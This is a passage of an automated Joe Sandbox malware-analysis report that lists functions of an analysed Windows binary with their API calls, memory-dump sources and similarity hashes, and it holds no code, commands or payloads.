                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$]$h
                                                            • API String ID: 4104443479-3262404753
                                                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                            Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • CloseHandle.KERNEL32(?), ref: 00457E09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                            • String ID: <$@
                                                            • API String ID: 2417854910-1426351568
                                                            • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                            • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                            Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3705125965-3916222277
                                                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                            Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: 0
                                                            • API String ID: 135850232-4108050209
                                                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                            Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                            Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: AU3_GetPluginDetails
                                                            • API String ID: 145871493-4132174516
                                                            • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                            • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                            Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                            Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 3375834691-2298589950
                                                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                            Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: $<
                                                            • API String ID: 4104443479-428540627
                                                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                            Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                            Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                            Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                            Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                            Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: \VH
                                                            • API String ID: 2507767853-234962358
                                                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                            Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                            • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                            • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                            • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                            Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
